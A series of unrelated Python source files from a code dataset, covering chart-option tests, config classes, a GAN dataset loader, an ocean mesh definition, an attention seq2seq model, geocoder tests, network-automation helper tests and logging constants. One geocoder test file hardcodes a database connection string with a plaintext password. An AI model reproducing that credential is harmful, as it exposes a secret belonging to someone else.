ToolBoxFeatureBrushOpts()\n\n option = ToolBoxFeatureOpts(\n save_as_image=save_as_image,\n restore=restore,\n data_view=data_view,\n data_zoom=data_zoom,\n magic_type=magic_type,\n brush=brush,\n )\n expected = {\n \"saveAsImage\": save_as_image,\n \"restore\": restore,\n \"dataView\": data_view,\n \"dataZoom\": data_zoom,\n \"magicType\": magic_type,\n \"brush\": brush,\n }\n assert_equal(expected, remove_key_with_none_value(option.opts))\n\n\ndef test_toolbox_options_remove_none():\n option = ToolboxOpts(feature={})\n expected = {\n \"show\": True,\n \"orient\": \"horizontal\",\n \"itemSize\": 15,\n \"itemGap\": 10,\n \"left\": \"80%\",\n \"feature\": {},\n }\n assert_equal(expected, remove_key_with_none_value(option.opts))\n\n\ndef test_brush_options_remove_none():\n option = BrushOpts()\n expected = {\n \"brushMode\": \"single\",\n \"brushStyle\": {\n \"borderColor\": \"rgba(120,140,180,0.8)\",\n \"borderWidth\": 1,\n \"color\": \"rgba(120,140,180,0.3)\",\n },\n \"brushType\": \"rect\",\n \"removeOnClick\": True,\n \"throttleDelay\": 0,\n \"throttleType\": \"fixRate\",\n \"toolbox\": [\"rect\", \"polygon\", \"keep\", \"clear\"],\n \"transformable\": True,\n }\n assert_equal(expected, remove_key_with_none_value(option.opts))\n\n\ndef test_data_zoom_options_remove_none():\n option = DataZoomOpts()\n expected = {\n \"end\": 80,\n \"filterMode\": \"filter\",\n \"orient\": \"horizontal\",\n \"realtime\": True,\n \"show\": True,\n \"start\": 20,\n \"type\": \"slider\",\n \"zoomLock\": False,\n }\n assert_equal(expected, remove_key_with_none_value(option.opts))\n\n\ndef test_legend_options_remove_none():\n option = LegendOpts()\n expected = {\n \"show\": True,\n \"padding\": 5,\n \"itemGap\": 10,\n \"itemWidth\": 25,\n \"itemHeight\": 14,\n }\n assert_equal(expected, remove_key_with_none_value(option.opts))\n\n\ndef test_visual_map_options_remove_none():\n option = VisualMapOpts()\n expected = {\n \"calculable\": True,\n \"inRange\": {\"color\": [\"#50a3ba\", \"#eac763\", \"#d94e5d\"]},\n \"itemHeight\": 140,\n \"itemWidth\": 20,\n \"max\": 100,\n \"min\": 0,\n \"orient\": \"vertical\",\n \"show\": True,\n \"showLabel\": True,\n \"inverse\": False,\n \"splitNumber\": 5,\n \"type\": \"continuous\",\n \"borderWidth\": 0,\n }\n assert_equal(expected, remove_key_with_none_value(option.opts))\n\n\ndef test_tool_tip_options_remove_none():\n option = TooltipOpts(textstyle_opts=None)\n expected = {\n \"alwaysShowContent\": False,\n \"axisPointer\": {\"type\": \"line\"},\n \"borderWidth\": 0,\n \"hideDelay\": 100,\n \"padding\": 5,\n \"show\": True,\n \"showContent\": True,\n \"showDelay\": 0,\n \"trigger\": \"item\",\n \"triggerOn\": \"mousemove|click\",\n }\n assert_equal(expected, remove_key_with_none_value(option.opts))\n","sub_path":"test/test_global_options.py","file_name":"test_global_options.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"474658209","text":"import os\nfrom Configs import ConfigBase\n\n# define different classes per environment\n\n\nclass DEFAULT(ConfigBase):\n # commit every n files\n COMMIT_INTERVAL = 100\n\n SCRIPT_DIR = os.path.dirname(\n os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__)))\n )\n\n DATA_BASE_DIR = os.path.join(SCRIPT_DIR, \"dataset/\")\n DATA_DIRS = [\n \"biorxiv_medrxiv\",\n \"comm_use_subset\",\n \"noncomm_use_subset\",\n \"custom_license\",\n ]\n METADATA_FILE = os.path.join(DATA_BASE_DIR, \"metadata.csv\")\n\n # Override label names\n JSON2GRAPH_LABELOVERRIDE = {\n \"authors\": \"Author\",\n }\n\n JSON2GRAPH_PROPOVERRIDE = {\n \"Doi\": {\"DOI\": \"id\"},\n \"Arxiv\": {\"arXiv\": \"id\"},\n \"Pmcid\": {\"PMCID\": \"id\"},\n \"Pmid\": {\"PMID\": \"id\"},\n }\n\n JSON2GRAPH_GENERATED_HASH_ID_ATTR_NAME = \"_hash_id\"\n # Define for which labels and how a hash id attr should be generated\n JSON2GRAPH_GENERATED_HASH_IDS = {\n \"Abstract\": [\"text\"], # Generate an id based on the property \"text\"\n \"Affiliation\": \"AllAttributes\", # Generate an id based all properties\n \"Author\": \"AllAttributes\",\n \"Back_matter\": \"AllAttributes\",\n \"Bibref\": \"AllAttributes\",\n \"Bib_entries\": \"AllInnerContent\", # Generate an id based all attr and childrens attr\n \"Body_text\": \"AllAttributes\",\n \"Cite_spans\": \"AllInnerContent\",\n \"Figref\": \"AllAttributes\",\n \"Location\": \"AllAttributes\",\n \"Metadata\": \"AllInnerContent\",\n \"Other_ids\": \"AllInnerContent\",\n \"Ref_entries\": \"AllInnerContent\",\n \"Ref_spans\": \"AllInnerContent\",\n \"Tabref\": \"AllAttributes\",\n }\n\n # Define which properties can be taken as primary key for specific labels\n # {\"label\":\"attribute-that-works-as-id\"}\n JSON2GRAPH_ID_ATTR = {\n \"Arxiv\": \"id\",\n \"Doi\": \"id\",\n \"Paper\": \"paper_id\",\n \"Pmcid\": \"id\",\n \"Pmid\": \"id\",\n }\n JSON2GRAPH_CONCAT_LIST_ATTR = {\"middle\": \" \"}\n JSON2GRAPH_COLLECTION_NODE_LABEL = \"CollectionHub\"\n\n\n# All following config classes inherit from DEFAULT\nclass PRODUCTION(DEFAULT):\n pass\n\n\nclass DEVELOPMENT(DEFAULT):\n COMMIT_INTERVAL = 2\n DATA_BASE_DIR = os.path.join(DEFAULT.SCRIPT_DIR, \"testdataset/\")\n DATA_DIRS = [\n \"test\",\n ]\n METADATA_FILE = os.path.join(DATA_BASE_DIR, \"metadata.csv\")\n","sub_path":"dataloader/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"36115775","text":"# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport cv2\nimport paddle\nimport os.path\nfrom .base_dataset import BaseDataset, get_params, get_transform\nfrom .image_folder import make_dataset\n\nfrom .builder import DATASETS\nfrom .transforms.builder import build_transforms\n\n\n@DATASETS.register()\nclass PairedDataset(BaseDataset):\n \"\"\"A dataset class for paired image dataset.\n \"\"\"\n def __init__(self, cfg):\n \"\"\"Initialize this dataset class.\n\n Args:\n cfg (dict): configs of datasets.\n \"\"\"\n BaseDataset.__init__(self, cfg)\n self.dir_AB = os.path.join(cfg.dataroot,\n cfg.phase) # get the image directory\n self.AB_paths = sorted(make_dataset(\n self.dir_AB, cfg.max_dataset_size)) # get image paths\n\n self.input_nc = self.cfg.output_nc if self.cfg.direction == 'BtoA' else self.cfg.input_nc\n self.output_nc = self.cfg.input_nc if self.cfg.direction == 'BtoA' else self.cfg.output_nc\n self.transforms = build_transforms(cfg.transforms)\n\n def __getitem__(self, index):\n \"\"\"Return a data point and its metadata information.\n\n Parameters:\n index - - a random integer for data indexing\n\n Returns a dictionary that contains A, B, A_paths and B_paths\n A (tensor) - - an image in the input domain\n B (tensor) - - its corresponding image in the target domain\n A_paths (str) - - image paths\n B_paths (str) - - image paths (same as A_paths)\n \"\"\"\n # read a image given a random integer index\n AB_path = self.AB_paths[index]\n AB = cv2.cvtColor(cv2.imread(AB_path), cv2.COLOR_BGR2RGB)\n\n # split AB image into A and B\n h, w = AB.shape[:2]\n # w, h = AB.size\n w2 = int(w / 2)\n\n A = AB[:h, :w2, :]\n B = AB[:h, w2:, :]\n\n # apply the same transform to both A and B\n A, B = self.transforms((A, B))\n\n return {'A': A, 'B': B, 'A_paths': AB_path, 'B_paths': AB_path}\n\n def __len__(self):\n \"\"\"Return the total number of images in the dataset.\"\"\"\n return len(self.AB_paths)\n","sub_path":"ppgan/datasets/paired_dataset.py","file_name":"paired_dataset.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"590106962","text":"#!/usr/bin/env python\n\"\"\"\n% Create cell width for this mesh on a regular latitude-longitude grid.\n% Outputs:\n% cellWidth - m x n array, entries are desired cell width in km\n% lon - longitude, vector of length m, with entries between -180 and 180, degrees\n% lat - latitude, vector of length n, with entries between -90 and 90, degrees\n\"\"\"\nimport numpy as np\nimport jigsaw_to_MPAS.mesh_definition_tools as mdt\n\n\ndef cellWidthVsLatLon():\n\n ddeg = 0.1\n\n lat = np.arange(-90, 90.01, ddeg)\n lon = np.arange(-180, 180.01, ddeg)\n\n cellWidthSouth = 15 * np.ones(lat.size)\n cellWidthNorth = 60 * np.ones(lat.size)\n latTransition = -30\n latWidthTransition = 5\n\n cellWidthVsLat = mdt.mergeCellWidthVsLat(\n lat,\n cellWidthSouth,\n cellWidthNorth,\n latTransition,\n latWidthTransition)\n\n cellWidth = np.ones((lat.size, lon.size))\n for i in range(lon.size):\n cellWidth[:, i] = cellWidthVsLat\n\n #print 'cellWidthSouth', cellWidthSouth\n #print 'cellWidthNorth', cellWidthNorth\n #print 'cellWidthVsLat', cellWidthVsLat\n\n return cellWidth, lon, lat\n","sub_path":"testing_and_setup/compass/ocean/global_ocean/SOQU60to15/init/define_base_mesh.py","file_name":"define_base_mesh.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"185522591","text":"import numpy as np\nimport typing\nfrom typing import Any, Tuple\nimport tensorflow as tf\nfrom tensorflow.keras.layers.experimental import preprocessing\nimport tensorflow_text as tf_text\nfrom src.interpreter.attention_auto_encoder.shape_checker import *\n\n\n\n\nclass Encoder(tf.keras.layers.Layer):\n def __init__(self, input_vocab_size, embedding_dim, enc_units):\n super(Encoder, self).__init__()\n self.enc_units = enc_units\n self.input_vocab_size = input_vocab_size\n\n # The embedding layer converts tokens to vectors\n self.embedding = tf.keras.layers.Embedding(self.input_vocab_size,\n embedding_dim)\n\n # The GRU RNN layer processes those vectors sequentially.\n self.gru = tf.keras.layers.GRU(self.enc_units,\n # Return the sequence and state\n return_sequences=True,\n return_state=True,\n recurrent_initializer='glorot_uniform')\n\n def call(self, tokens, state=None):\n shape_checker = ShapeChecker()\n shape_checker(tokens, ('batch', 's'))\n\n # 2. The embedding layer looks up the embedding for each token.\n vectors = self.embedding(tokens)\n shape_checker(vectors, ('batch', 's', 'embed_dim'))\n\n # 3. The GRU processes the embedding sequence.\n # output shape: (batch, s, enc_units)\n # state shape: (batch, enc_units)\n output, state = self.gru(vectors, initial_state=state)\n shape_checker(output, ('batch', 's', 'enc_units'))\n shape_checker(state, ('batch', 'enc_units'))\n\n # 4. Returns the new sequence and its state.\n return output, state\n\nclass BahdanauAttention(tf.keras.layers.Layer):\n def __init__(self, units):\n super().__init__()\n # For Eqn. (4), the Bahdanau attention\n self.W1 = tf.keras.layers.Dense(units, use_bias=False)\n self.W2 = tf.keras.layers.Dense(units, use_bias=False)\n\n self.attention = tf.keras.layers.AdditiveAttention()\n\n def call(self, query, value, mask):\n shape_checker = ShapeChecker()\n shape_checker(query, ('batch', 't', 'query_units'))\n shape_checker(value, ('batch', 's', 'value_units'))\n shape_checker(mask, ('batch', 's'))\n\n # From Eqn. (4), `W1@ht`.\n w1_query = self.W1(query)\n shape_checker(w1_query, ('batch', 't', 'attn_units'))\n\n # From Eqn. (4), `W2@hs`.\n w2_key = self.W2(value)\n shape_checker(w2_key, ('batch', 's', 'attn_units'))\n\n query_mask = tf.ones(tf.shape(query)[:-1], dtype=bool)\n value_mask = mask\n\n context_vector, attention_weights = self.attention(\n inputs = [w1_query, value, w2_key],\n mask=[query_mask, value_mask],\n return_attention_scores = True,\n )\n shape_checker(context_vector, ('batch', 't', 'value_units'))\n shape_checker(attention_weights, ('batch', 't', 's'))\n\n return context_vector, attention_weights\n\nclass Decoder(tf.keras.layers.Layer):\n def __init__(self, output_vocab_size, embedding_dim, dec_units):\n super(Decoder, self).__init__()\n self.dec_units = dec_units\n self.output_vocab_size = output_vocab_size\n self.embedding_dim = embedding_dim\n\n # For Step 1. The embedding layer convets token IDs to vectors\n self.embedding = tf.keras.layers.Embedding(self.output_vocab_size,\n embedding_dim)\n\n # For Step 2. The RNN keeps track of what's been generated so far.\n self.gru = tf.keras.layers.GRU(self.dec_units,\n return_sequences=True,\n return_state=True,\n recurrent_initializer='glorot_uniform')\n\n # For step 3. The RNN output will be the query for the attention layer.\n self.attention = BahdanauAttention(self.dec_units)\n\n # For step 4. Eqn. (3): converting `ct` to `at`\n self.Wc = tf.keras.layers.Dense(dec_units, activation=tf.math.tanh,\n use_bias=False)\n\n # For step 5. This fully connected layer produces the logits for each\n # output token.\n self.fc = tf.keras.layers.Dense(self.output_vocab_size)\n\n\n\n\n def call(self,\n inputs,\n state=None):\n shape_checker = ShapeChecker()\n shape_checker(inputs.new_tokens, ('batch', 't'))\n shape_checker(inputs.enc_output, ('batch', 's', 'enc_units'))\n shape_checker(inputs.mask, ('batch', 's'))\n\n if state is not None:\n shape_checker(state, ('batch', 'dec_units'))\n\n # Step 1. Lookup the embeddings\n vectors = self.embedding(inputs.new_tokens)\n shape_checker(vectors, ('batch', 't', 'embedding_dim'))\n\n # Step 2. Process one step with the RNN\n rnn_output, state = self.gru(vectors, initial_state=state)\n\n shape_checker(rnn_output, ('batch', 't', 'dec_units'))\n shape_checker(state, ('batch', 'dec_units'))\n\n # Step 3. Use the RNN output as the query for the attention over the\n # encoder output.\n context_vector, attention_weights = self.attention(\n query=rnn_output, value=inputs.enc_output, mask=inputs.mask)\n shape_checker(context_vector, ('batch', 't', 'dec_units'))\n shape_checker(attention_weights, ('batch', 't', 's'))\n\n # Step 4. Eqn. (3): Join the context_vector and rnn_output\n # [ct; ht] shape: (batch t, value_units + query_units)\n context_and_rnn_output = tf.concat([context_vector, rnn_output], axis=-1)\n\n # Step 4. Eqn. (3): `at = tanh(Wc@[ct; ht])`\n attention_vector = self.Wc(context_and_rnn_output)\n shape_checker(attention_vector, ('batch', 't', 'dec_units'))\n\n # Step 5. Generate logit predictions:\n logits = self.fc(attention_vector)\n shape_checker(logits, ('batch', 't', 'output_vocab_size'))\n\n return DecoderOutput(logits, attention_weights), state\n\n\nclass DecoderInput(typing.NamedTuple):\n new_tokens: Any\n enc_output: Any\n mask: Any\n\nclass DecoderOutput(typing.NamedTuple):\n logits: Any\n attention_weights: Any\n\n","sub_path":"src/interpreter/attention_auto_encoder/autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":5926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"115093817","text":"import unittest\nfrom cataloger import reverse_geocode_wgs84_boundingbox\n\n\nclass TestGeocoder(unittest.TestCase):\n \"\"\"\n unittests for the geocoder function\n \"\"\"\n def setUp(self):\n self.pg_conn_str = \"postgres://james:MopMetal3@localhost:5432/mapcatalogue\"\n self.us_bbox = (-74.66163264559283, 39.650417182507944, -72.0006154054558, 41.612140592278074)\n\n def test_geocoder_returns_list(self):\n self.assertIsInstance(\n reverse_geocode_wgs84_boundingbox(self.pg_conn_str, self.us_bbox),\n list,\n 'Should be a list'\n )\n\n def test_geocoder_contains_dict(self):\n self.assertIsInstance(\n reverse_geocode_wgs84_boundingbox(self.pg_conn_str, self.us_bbox)[0],\n dict,\n 'List should contain dictionaries'\n )\n\n def test_geocoder_equals(self):\n bboxes = {\n 1: [\n (-84.7, 28.5, -66.8, 42.6),\n [{'country': 'Canada', 'continent': 'North America'},\n {'country': 'United States', 'continent': 'North America'}]\n ],\n 2: [\n (-4.080, 55.572, -2.228, 57.250),\n [{'country': 'England', 'continent': 'Europe'},\n {'country': 'Scotland', 'continent': 'Europe'}]\n ],\n }\n\n for bb in bboxes:\n bbox_coords = bboxes[bb][0]\n geographies = bboxes[bb][1]\n\n self.assertEqual(\n reverse_geocode_wgs84_boundingbox(self.pg_conn_str, bboxes[bb][0]),\n bboxes[bb][1],\n 'Geographies for BBox should equal: {0}'.format(bboxes[bb][1])\n )\n\n\nif __name__ == \"__main__\":\n unittest.main()\n\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"546862590","text":"import importlib\nimport os\nimport re\nimport sys\nfrom io import TextIOWrapper\nfrom logging import getLogger\nfrom pathlib import Path\n\nimport pkg_resources # pylint: disable=C041\nimport pytest\n\nimport scrapli\nfrom scrapli.exceptions import TransportPluginError\nfrom scrapli.helper import (\n _find_transport_plugin,\n _textfsm_get_template,\n attach_duplicate_log_filter,\n genie_parse,\n get_prompt_pattern,\n resolve_file,\n strip_ansi,\n textfsm_parse,\n ttp_parse,\n)\n\nTEST_DATA_DIR = f\"{Path(scrapli.__file__).parents[1]}/tests/test_data\"\n\nIOS_ARP = \"\"\"Protocol Address Age (min) Hardware Addr Type Interface\nInternet 172.31.254.1 - 0000.0c07.acfe ARPA Vlan254\nInternet 172.31.254.2 - c800.84b2.e9c2 ARPA Vlan254\n\"\"\"\n\n\ndef test_get_prompt_pattern_class_pattern():\n class_pattern = \"^averygoodpattern$\"\n result = get_prompt_pattern(\"\", class_pattern)\n assert result == re.compile(b\"^averygoodpattern$\", re.IGNORECASE | re.MULTILINE)\n\n\ndef test_get_prompt_pattern_class_pattern_no_line_start_end_markers():\n class_pattern = \"averygoodpattern\"\n result = get_prompt_pattern(class_pattern, \"\")\n assert result == re.compile(b\"averygoodpattern\")\n\n\ndef test_get_prompt_pattern_arg_pattern():\n class_pattern = \"averygoodpattern\"\n result = get_prompt_pattern(\"^awesomepattern$\", class_pattern)\n assert result == re.compile(b\"^awesomepattern$\", re.IGNORECASE | re.MULTILINE)\n\n\ndef test_get_prompt_pattern_arg_string():\n class_pattern = \"averygoodpattern\"\n result = get_prompt_pattern(\"awesomepattern\", class_pattern)\n assert result == re.compile(b\"awesomepattern\")\n\n\ndef test_get_prompt_pattern_arg_bytes():\n class_pattern = \"averygoodpattern\"\n result = get_prompt_pattern(b\"awesomepattern\", class_pattern)\n assert result == re.compile(b\"awesomepattern\")\n\n\ndef test__strip_ansi():\n output = b\"[admin@CoolDevice.Sea1: \\x1b[1m/\\x1b[0;0m]$\"\n output = strip_ansi(output)\n assert output == b\"[admin@CoolDevice.Sea1: /]$\"\n\n\n@pytest.mark.skipif(sys.platform.startswith(\"win\"), reason=\"not supporting textfsm on windows\")\ndef test__textfsm_get_template_valid_template():\n template = _textfsm_get_template(\"cisco_nxos\", \"show ip arp\")\n template_dir = pkg_resources.resource_filename(\"ntc_templates\", \"templates\")\n assert isinstance(template, TextIOWrapper)\n assert template.name == f\"{template_dir}/cisco_nxos_show_ip_arp.textfsm\"\n\n\n@pytest.mark.skipif(sys.platform.startswith(\"win\"), reason=\"not supporting textfsm on windows\")\ndef test__textfsm_get_template_invalid_template():\n template = _textfsm_get_template(\"cisco_nxos\", \"show racecar\")\n assert not template\n\n\n@pytest.mark.skipif(sys.platform.startswith(\"win\"), reason=\"not supporting textfsm on windows\")\n@pytest.mark.parametrize(\n \"parse_type\",\n [\n (\n False,\n [\"Internet\", \"172.31.254.1\", \"-\", \"0000.0c07.acfe\", \"ARPA\", \"Vlan254\"],\n ),\n (\n True,\n {\n \"protocol\": \"Internet\",\n \"address\": \"172.31.254.1\",\n \"age\": \"-\",\n \"mac\": \"0000.0c07.acfe\",\n \"type\": \"ARPA\",\n \"interface\": \"Vlan254\",\n },\n ),\n ],\n ids=[\"to_dict_false\", \"to_dict_true\"],\n)\ndef test_textfsm_parse_success(parse_type):\n to_dict = parse_type[0]\n expected_result = parse_type[1]\n template = _textfsm_get_template(\"cisco_ios\", \"show ip arp\")\n result = textfsm_parse(template, IOS_ARP, to_dict=to_dict)\n assert isinstance(result, list)\n assert result[0] == expected_result\n\n\n@pytest.mark.skipif(sys.platform.startswith(\"win\"), reason=\"not supporting textfsm on windows\")\n@pytest.mark.parametrize(\n \"parse_type\",\n [\n (\n False,\n [\"Internet\", \"172.31.254.1\", \"-\", \"0000.0c07.acfe\", \"ARPA\", \"Vlan254\"],\n ),\n (\n True,\n {\n \"protocol\": \"Internet\",\n \"address\": \"172.31.254.1\",\n \"age\": \"-\",\n \"mac\": \"0000.0c07.acfe\",\n \"type\": \"ARPA\",\n \"interface\": \"Vlan254\",\n },\n ),\n ],\n ids=[\"to_dict_false\", \"to_dict_true\"],\n)\ndef test_textfsm_parse_success_string_path(parse_type):\n to_dict = parse_type[0]\n expected_result = parse_type[1]\n template = _textfsm_get_template(\"cisco_ios\", \"show ip arp\")\n result = textfsm_parse(template.name, IOS_ARP, to_dict=to_dict)\n assert isinstance(result, list)\n assert result[0] == expected_result\n\n\n@pytest.mark.skipif(sys.platform.startswith(\"win\"), reason=\"not supporting textfsm on windows\")\ndef test_textfsm_parse_failure():\n template = _textfsm_get_template(\"cisco_ios\", \"show ip arp\")\n result = textfsm_parse(template, \"not really arp data\")\n assert result == []\n\n\n@pytest.mark.skipif(\n sys.version_info.minor > 8, reason=\"genie not currently available for python 3.9\"\n)\n@pytest.mark.skipif(sys.platform.startswith(\"win\"), reason=\"not supporting genie on windows\")\ndef test_genie_parse_success():\n result = genie_parse(\"iosxe\", \"show ip arp\", IOS_ARP)\n assert isinstance(result, dict)\n assert (\n result[\"interfaces\"][\"Vlan254\"][\"ipv4\"][\"neighbors\"][\"172.31.254.1\"][\"ip\"] == \"172.31.254.1\"\n )\n\n\n@pytest.mark.skipif(\n sys.version_info.minor > 8, reason=\"genie not currently available for python 3.9\"\n)\n@pytest.mark.skipif(sys.platform.startswith(\"win\"), reason=\"not supporting genie on windows\")\ndef test_genie_parse_failure():\n result = genie_parse(\"iosxe\", \"show ip arp\", \"not really arp data\")\n assert result == []\n # w/out killing this module pyfakefs explodes. dont remember why/how i found that out...\n del sys.modules[\"pyats.configuration\"]\n\n\ndef test_ttp_parse():\n # example data lifted straight out of ttp docs\n data_to_parse = \"\"\"\n interface Loopback0\n description Router-id-loopback\n ip address 192.168.0.113/24\n !\n interface Vlan778\n description CPE_Acces_Vlan\n ip address 2002::fd37/124\n ip vrf CPE1\n !\n \"\"\"\n\n ttp_template = \"\"\"\n interface {{ interface }}\n ip address {{ ip }}/{{ mask }}\n description {{ description }}\n ip vrf {{ vrf }}\n \"\"\"\n\n expected = [\n [\n {\n \"ip\": \"192.168.0.113\",\n \"mask\": \"24\",\n \"description\": \"Router-id-loopback\",\n \"interface\": \"Loopback0\",\n },\n {\n \"vrf\": \"CPE1\",\n \"ip\": \"2002::fd37\",\n \"mask\": \"124\",\n \"description\": \"CPE_Acces_Vlan\",\n \"interface\": \"Vlan778\",\n },\n ]\n ]\n result = ttp_parse(template=ttp_template, output=data_to_parse)\n assert result == expected\n\n\ndef test_ttp_parse_invalid_template():\n result = ttp_parse(template=None, output=\"blah\")\n assert result == []\n\n\ndef test_ttp_parse_failed_to_parse():\n result = ttp_parse(template=\"mytemplateisneat\", output=\"blah\")\n assert result == [{}]\n\n\n@pytest.mark.skipif(\n sys.platform.startswith(\"win\"), reason=\"not dealing with windows path things in tests\"\n)\ndef test_resolve_file():\n resolved_file = resolve_file(file=f\"{TEST_DATA_DIR}/files/_ssh_config\")\n assert resolved_file == f\"{TEST_DATA_DIR}/files/_ssh_config\"\n\n\n@pytest.mark.skipif(\n sys.platform.startswith(\"win\"), reason=\"not dealing with windows path things in tests\"\n)\ndef test_resolve_file_expanduser(fs):\n fs.add_real_file(\n source_path=f\"{TEST_DATA_DIR}/files/_ssh_config\",\n target_path=f\"{os.path.expanduser('~')}/myneatfile\",\n )\n resolved_file = resolve_file(file=f\"~/myneatfile\")\n assert resolved_file == f\"{os.path.expanduser('~')}/myneatfile\"\n\n\n@pytest.mark.skipif(\n sys.platform.startswith(\"win\"), reason=\"not dealing with windows path things in tests\"\n)\ndef test_resolve_file_failure():\n with pytest.raises(ValueError) as exc:\n resolve_file(file=f\"~/myneatfile\")\n assert str(exc.value) == \"File path `~/myneatfile` could not be resolved\"\n\n\ndef test_attach_duplicate_log_filter():\n dummy_logger = getLogger(\"this_is_a_dumb_test_log\")\n assert dummy_logger.filters == []\n attach_duplicate_log_filter(logger=dummy_logger)\n # simple assert to confirm that we got the dup filter attached to the new logger\n assert dummy_logger.filters[0].__class__.__name__ == \"DuplicateFilter\"\n\n\ndef test__find_transport_plugin_failure():\n with pytest.raises(ModuleNotFoundError) as exc:\n _find_transport_plugin(transport=\"blah\")\n assert (\n str(exc.value)\n == \"\\n***** Module 'scrapli_blah' not found! ************************************************\\nTo resolve this issue, ensure you are referencing a valid transport plugin. Transport plugins should be named similar to `scrapli_paramiko` or `scrapli_ssh2`, and can be selected by passing simply `paramiko` or `ssh2` into the scrapli driver. You can install most plugins with pip: `pip install scrapli-ssh2` for example.\\n***** Module 'scrapli_blah' not found! ************************************************\"\n )\n\n\ndef test___find_transport_plugin_module_failed_to_load(monkeypatch):\n from scrapli_ssh2 import transport\n\n monkeypatch.setattr(transport, \"Transport\", None)\n with pytest.raises(TransportPluginError) as exc:\n _find_transport_plugin(transport=\"ssh2\")\n assert (\n str(exc.value)\n == \"Failed to load transport plugin `ssh2` transport class or required arguments\"\n )\n\n\ndef test_textfsm_get_template_no_textfsm(monkeypatch):\n def mock_import_module(name, package):\n raise ModuleNotFoundError\n\n monkeypatch.setattr(importlib, \"import_module\", mock_import_module)\n\n with pytest.warns(UserWarning) as warning_msg:\n _textfsm_get_template(platform=\"blah\", command=\"blah\")\n assert (\n str(warning_msg._list[0].message)\n == \"\\n***** Module 'None' not installed! ****************************************************\\nTo resolve this issue, install 'None'. You can do this in one of the following ways:\\n1: 'pip install -r requirements-textfsm.txt'\\n2: 'pip install scrapli[textfsm]'\\n***** Module 'None' not installed! ****************************************************\"\n )\n\n\ndef test_genie_parse_no_genie(monkeypatch):\n def mock_import_module(name, package):\n raise ModuleNotFoundError\n\n monkeypatch.setattr(importlib, \"import_module\", mock_import_module)\n\n with pytest.warns(UserWarning) as warning_msg:\n genie_parse(platform=\"blah\", command=\"blah\", output=\"blah\")\n assert (\n str(warning_msg._list[0].message)\n == \"\\n***** Module 'None' not installed! ****************************************************\\nTo resolve this issue, install 'None'. You can do this in one of the following ways:\\n1: 'pip install -r requirements-genie.txt'\\n2: 'pip install scrapli[genie]'\\n***** Module 'None' not installed! ****************************************************\"\n )\n\n\ndef test_ttp_parse_no_ttp(monkeypatch):\n def mock_import_module(name):\n raise ModuleNotFoundError\n\n monkeypatch.setattr(importlib, \"import_module\", mock_import_module)\n\n with pytest.warns(UserWarning) as warning_msg:\n ttp_parse(template=\"blah\", output=\"blah\")\n assert (\n str(warning_msg._list[0].message)\n == \"\\n***** Module 'None' not installed! ****************************************************\\nTo resolve this issue, install 'None'. You can do this in one of the following ways:\\n1: 'pip install -r requirements-ttp.txt'\\n2: 'pip install scrapli[ttp]'\\n***** Module 'None' not installed! ****************************************************\"\n )\n","sub_path":"tests/unit/test_helper.py","file_name":"test_helper.py","file_ext":"py","file_size_in_byte":11673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"503169630","text":"# encoding: utf-8\n\"\"\"\nDefine logging level names\n--------------------------\n\n.. rst-class:: html-toggle\n\nIdentification\n--------------\n\nCreated on Sep 28, 2014\n\nDefine names for the logging levels\n\n@author: Jonathan Gossage\n\n@copyright: © 2015 Jonathan Gossage. All rights reserved.\n\n@license: Apache 2\n\n@contact: jgossage at gmail.com\n@deffield updated: Updated\n\n\"\"\"\n\nimport logging\n\n# Define our symbolic names for the Python logging levels\nCRITICAL = 'critical'\n\"\"\"Our name for critical logging level\"\"\"\nERROR = 'error'\n\"\"\"Our name for error logging level\"\"\"\nWARNING = 'warning'\n\"\"\"Our name for warning logging level\"\"\"\nINFO = 'info'\n\"\"\"Our name for info logging level\"\"\"\nDEBUG = 'debug'\n\"\"\"Our name for debug logging level\"\"\"\n\nLLEVELS = {CRITICAL: logging.CRITICAL,\n ERROR: logging.ERROR,\n WARNING: logging.WARNING,\n INFO: logging.INFO,\n DEBUG: logging.DEBUG}\n\"\"\"\nMap from our symbolic names to the Python logging system levels\n\"\"\"\n\nRLEVELS = {logging.CRITICAL: CRITICAL,\n logging.ERROR: ERROR,\n logging.WARNING: WARNING,\n logging.INFO: INFO,\n logging.DEBUG: DEBUG}\n\"\"\"\nMap from the Python logging system log level codes to our symbolic names\n\"\"\"\n","sub_path":"Logging/src/logutils/loglevels.py","file_name":"loglevels.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
